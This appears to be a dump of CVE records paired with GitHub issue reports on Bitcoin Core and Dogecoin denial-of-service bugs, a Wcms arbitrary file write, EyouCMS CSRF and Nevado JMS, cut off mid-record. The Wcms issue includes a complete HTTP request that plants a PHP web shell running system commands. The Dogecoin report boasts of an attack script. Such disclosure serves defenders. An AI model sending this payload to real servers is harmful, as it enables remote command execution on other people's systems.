"url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/visualbasic6/drain"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://x.com/123456/status/1711601593399828530"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27623"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/bitcoin/bitcoin/pull/27610"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/visualbasic6/drain"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://x.com/123456/status/1711601593399828530"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bitcoin:bitcoin_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD299C72-AD8C-479D-9606-2CE3FEA945FB",
"versionEndExcluding": "24.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/bitcoin/bitcoin/issues/27586 | [
"Issue Tracking"
] | github.com | [
"bitcoin",
"bitcoin"
] | I've been seeing 100% cpu usage on one of my bitcoind nodes recently, with transactions taking >60s to be accepted into the mempool. Digging into it, the problem seems to be `BOOST_MULTI_INDEX_ENABLE_SAFE_MODE` which was introduced in #24395. That results in iterator destruction taking O(n) time (in the number of other active iterators on the same multi-index) in the worst case, rather than O(1) time, due to keeping the iterators in a [singly linked list](https://www.boost.org/doc/libs/1_82_0/boost/multi_index/detail/safe_mode.hpp):
```
* Iterators are chained in a single attached list, whose header is
* kept by the container. More elaborate data structures would yield better
* performance, but I decided to keep complexity to a minimum since
* speed is not an issue here.
```
Speed does become an issue here though, as we keep an iterator around for every mempool entry (in `vTxHashes`).
This isn't always a problem: presumably in the normal case new iterators are added to the head of the list then removed while they're still roughly at the head of the list, giving O(1) timing; but somehow having a full mempool (and hence TrimToSize actually doing things) triggers worst case behaviour? | CPU DoS on mainnet in debug mode | https://api.github.com/repos/bitcoin/bitcoin/issues/27586/comments | 31 | 2023-05-06T02:00:35Z | 2024-05-28T12:53:26Z | https://github.com/bitcoin/bitcoin/issues/27586 | 1,698,374,069 | 27,586 | 5,165 |
CVE-2023-33297 | 2023-05-22T05:15:09.460 | Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (e.g., CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27586"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27623"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/bitcoin/bitcoin/pull/27610"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/visualbasic6/drain"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://x.com/123456/status/1711601593399828530"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27623"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/bitcoin/bitcoin/pull/27610"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/visualbasic6/drain"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://x.com/123456/status/1711601593399828530"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bitcoin:bitcoin_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD299C72-AD8C-479D-9606-2CE3FEA945FB",
"versionEndExcluding": "24.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/bitcoin/bitcoin/issues/27623 | [
"Issue Tracking"
] | github.com | [
"bitcoin",
"bitcoin"
] | ### Is there an existing issue for this?
- [X] I have searched the existing issues
### Current behaviour
We are the technical team from AntPool. We found that when the Bitcoin wallet node processes the process message recently, the single-threaded CPU 100% causes block parsing delays, resulting in serious technical failures.
Our version number is the latest version 24.0.1。
Not only antpool, we also asked other mining pools and found this problem. This will lead to increasingly serious orphan blocks and forks.
### Expected behaviour
Run ProcessMessage with multiple threads to reduce the performance problem of CPU single-thread ProcessMessage.
Or are there other configurations that can alleviate this problem?
### Steps to reproduce
Run the wallet, synchronize to the latest height, and then observe the CPU usage. You can see that there is a single-core CPU usage that remains at 100% for a long time
### Relevant log output
_No response_
### How did you obtain Bitcoin Core
Pre-built binaries
### What version of Bitcoin Core are you using?
v24.0.1
### Operating system and version
Ubuntu 22.04 LTC
### Machine specifications
_No response_ | One core in CPU usage rate remains at 100% for a long time, causing serious delays in new blocks and forks | https://api.github.com/repos/bitcoin/bitcoin/issues/27623/comments | 5 | 2023-05-11T07:49:14Z | 2024-05-17T12:51:22Z | https://github.com/bitcoin/bitcoin/issues/27623 | 1,705,261,393 | 27,623 | 5,166 |
CVE-2023-33297 | 2023-05-22T05:15:09.460 | Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (e.g., CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27586"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27623"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/bitcoin/bitcoin/pull/27610"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/visualbasic6/drain"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://x.com/123456/status/1711601593399828530"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27623"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/bitcoin/bitcoin/pull/27610"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/visualbasic6/drain"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://x.com/123456/status/1711601593399828530"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bitcoin:bitcoin_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD299C72-AD8C-479D-9606-2CE3FEA945FB",
"versionEndExcluding": "24.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544 | null | github.com | [
"dogecoin",
"dogecoin"
] | **edit**: this was a dos/crash that ran resources sky high and could've netsplit bitcoin and could probably still rock dogecoin, litecoin and even bitcoin because i outmaneuver core like a monster in the game you heard me https://nvd.nist.gov/vuln/detail/CVE-2023-33297 this cve links to this issue tbh
thanks
**original jawn**:
hi,
there is a remote attack that can be carried out in perpetuity against vulnerable nodes in a way that a single attacking machine can force `dogecoind` to upload > 130MB/s to the attacking machine in a sustained way.
doge nodes on isps or cloud providers that charge for or throttle upstream after a cap has been reached are, unless hardened against this attack at a server level, vulnerable to the attack.
i did some testing and ran my digitalocean bandwidth costs to > $175 relatively quickly.

making this a financial attack against vulnerable nodes - but not an attack capable of taking the network offline.
the attack is carried out by an [evil multithreaded script](https://github.com/visualbasic6/drain) that pretends to be several valid nodes. this is accomplished by operating in the network at a low p2p protocol level. after performing a complete handshake with the target node, resulting in a healthy peer connection, the script begins to request protocol message content in a loop. at this point a single attacking machine can trigger, again, `dogecoind` into sending > 130MB/s worth of data. additionally - with code alterations it is likely that the evil script could target multiple dogecoin nodes simultaneously, from one machine, assuming that certain conditions are met on the attacker's end.
i can't find a bug bounty program so i'm just posting it here. it's not really the exploit of the century so i'm not concerned with evil actors carrying out bandwidth attacks against their enemies. that said - still - [get that fixed](https://youtube.com/watch?v=BU3tDES29sY&t=143s).
bitcoin and litecoin are also vulnerable to the attack.
but blockstream (skids) and their approved programmers (skids) are ants at a picnic when it comes to irresponsible public disclosure. i'd like to think that, at least here in the doge community, we like to have a bit of fun and [do a little trolling](https://youtu.be/PobQzVsj7GE?t=4).
demo:
[](https://asciinema.org/a/577193)
mad <3,
[kev](https://twitter.com/123456) (pad) | remote p2p bandwidth/cpu attack | https://api.github.com/repos/dogecoin/dogecoin/issues/3243/comments | 14 | 2023-04-04T10:02:54Z | 2025-04-29T04:36:01Z | https://github.com/dogecoin/dogecoin/issues/3243 | 1,653,572,803 | 3,243 | 5,167 |
CVE-2023-31689 | 2023-05-22T20:15:10.887 | In Wcms 0.3.2, an attacker can send a crafted request from a vulnerable web application backend server /wcms/wex/html.php via the finish parameter and the textAreaCode parameter. It can write arbitrary strings into custom file names and upload any files, and write malicious code to execute scripts to trigger command execution. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/vedees/wcms/issues/15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/vedees/wcms/issues/15"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/vedees/wcms/issues/15 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"vedees",
"wcms"
] | Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file
# Vulnerability discovery
Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file
```php
if (isset($_GET['finish'])) {
$path = $_GET['finish'];
file_put_contents($path, $_POST['textAreaCode']);
```

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file_put_contents function to write malicious code into a custom file
# construct poc
Use controllable variables to write malicious code into the shell.php file in the current directory
The payload is as follows:
```
POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
Host: 192.168.3.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
Upgrade-Insecure-Requests: 1
Content-Length: 36
textAreaCode=<?php system('whoami');?>
```

It can be seen that the write is successful

# get shell
Access the written malicious file, find that the malicious code is successfully executed, and echo it out

| Arbitrary file write vulnerability in /wcms/wex/html.php | https://api.github.com/repos/vedees/wcms/issues/15/comments | 0 | 2023-04-14T16:41:40Z | 2023-04-14T17:36:38Z | https://github.com/vedees/wcms/issues/15 | 1,668,576,560 | 15 | 5,168 |
CVE-2023-31708 | 2023-05-23T01:15:09.960 | A Cross-Site Request Forgery (CSRF) in EyouCMS v1.6.2 allows attackers to execute arbitrary commands via a supplying a crafted HTML file to the Upload software format function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/41"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/41"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/weng-xianhu/eyoucms/issues/41 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | let's see the operation:
First,we should add the js and html in "Upload software format" .
Second,we clicked the submit,and use Burp suite to Intercept the packet.
<img width="1251" alt="屏幕截图 2023-04-16 170400" src="https://user-images.githubusercontent.com/60973265/232288495-074b92f6-7789-4a20-879d-ef7fd31a3a08.png">
Third,we use the csrf tools in burp suite profession to create CSRF poc
<img width="1255" alt="屏幕截图 2023-04-16 170911" src="https://user-images.githubusercontent.com/60973265/232288806-95284794-f2cc-4e49-90b3-056669a29773.png">
Put the poc into an html file and send it to the victim,when the administrator clicke the page ,this means we can upload the js/html file.
Fourth,When we use the administrator account to delete the administrator account, or delete the article, use burp suite to capture the package, make csrf poc


Fifth,We need a low permission account to publish the article, then put the two produced POCs into the html file, and then into the attachment

When the administrator opens this attachment, the article and possibly the administrator are deleted, and this is not restricted by browser security
This is the code in question

Solution: Add the token authentication | Three csrf vulnerabilities, you can modify Settings, you can delete articles, you can delete users | https://api.github.com/repos/weng-xianhu/eyoucms/issues/41/comments | 0 | 2023-04-16T10:54:52Z | 2024-03-22T06:50:30Z | https://github.com/weng-xianhu/eyoucms/issues/41 | 1,669,861,738 | 41 | 5,169 |
CVE-2023-31826 | 2023-05-23T01:15:10.127 | Skyscreamer Open Source Nevado JMS v1.3.2 does not perform security checks when receiving messages. This allows attackers to execute arbitrary commands via supplying crafted data. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://nevado.skyscreamer.org/"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/skyscreamer/nevado/issues/121"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/skyscreamer/nevado/releases"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://novysodope.github.io/2023/04/01/95/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://nevado.skyscreamer.org/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/skyscreamer/nevado/issues/121"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/skyscreamer/nevado/releases"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://novysodope.github.io/2023/04/01/95/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:skyscreamer:nevado_jms:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "37A120A3-A27D-498C-AA78-6CE81B8AF39B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"862"
] | 862 | https://github.com/skyscreamer/nevado/issues/121 | [
"Issue Tracking"
] | github.com | [
"skyscreamer",
"nevado"
] | I have a security vulnerability that I want to report to this project, but I cannot contact the email on the official website,prompt "The system cannot find the email address screamers@skyscreamer.org ” or "The system cannot find the email address nevado-dev@skyscreamer.org ”. Is there no one running it? If the developer or responsible person sees this issue, please reply, Next, we can discuss technical details regarding this vulnerability.
Kind regards | Is this project still operated by anyone else? | https://api.github.com/repos/skyscreamer/nevado/issues/121/comments | 0 | 2023-04-14T03:11:17Z | 2023-05-18T01:40:19Z | https://github.com/skyscreamer/nevado/issues/121 | 1,667,441,255 | 121 | 5,170 |
CVE-2023-31669 | 2023-05-23T12:15:09.173 | WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote ("). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
